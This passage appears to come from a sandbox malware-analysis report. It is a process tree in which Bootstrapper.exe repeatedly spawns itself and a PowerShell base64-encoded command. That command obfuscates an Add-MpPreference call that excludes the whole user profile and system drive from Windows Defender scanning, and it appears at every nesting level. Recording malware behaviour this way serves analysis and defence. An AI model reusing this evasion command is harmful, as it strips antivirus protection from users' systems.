        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        26⤵
        
        PID:5868
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        26⤵
        
        PID:6016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        27⤵
        
        PID:5980
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        27⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        28⤵
        
        PID:1612
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        28⤵
        
        PID:6148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        29⤵
        
        PID:6364
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        29⤵
        
        PID:6372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        30⤵
        
        PID:6580
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        30⤵
        
        PID:6596
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        31⤵
        
        PID:6856
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        31⤵
        
        PID:6864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        32⤵
        
        PID:7044
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        32⤵
        
        PID:7064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        33⤵
        
        PID:5376
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        33⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        34⤵
        
        PID:6512
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        34⤵
        
        PID:6460
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        35⤵
        
        PID:6992
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        35⤵
        
        PID:6868
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        36⤵
        
        PID:6272
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        36⤵
        
        PID:4252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        37⤵
        
        PID:7116
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        37⤵
        
        PID:6640
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        38⤵
        
        PID:7104
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        38⤵
        
        PID:6892
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        39⤵
        
        PID:7348
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        39⤵
        
        PID:7360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        40⤵
        
        PID:7628
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        40⤵
        
        PID:7636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        41⤵
        
        PID:7788
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        41⤵
        
        PID:7856
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        42⤵
        
        PID:7132
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        42⤵
        
        PID:6756
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        43⤵
        
        PID:7464
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        43⤵
        
        PID:7644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        44⤵
        
        PID:7636
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        44⤵
        
        PID:7972
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        45⤵
        
        PID:2392
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        45⤵
        
        PID:4904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        46⤵
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        46⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        47⤵
        
        PID:1760
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        47⤵
        
        PID:1212
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        48⤵
        
        PID:7908
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        48⤵
        
        PID:7508
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        49⤵
        
        PID:2644
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        49⤵
        
        PID:4168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        50⤵
        
        PID:4044
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        50⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        51⤵
        
        PID:7360
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        51⤵
        
        PID:2336
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        52⤵
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        52⤵
        
        PID:1772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        53⤵
        
        PID:4948
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        53⤵
        
        PID:8136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        54⤵
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        54⤵
        
        PID:5200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        55⤵
        
        PID:2760
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        55⤵
        
        PID:3016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        56⤵
        
        PID:5860
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        56⤵
        
        PID:5592
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        57⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        57⤵
        
        PID:3820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        58⤵
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        58⤵
        
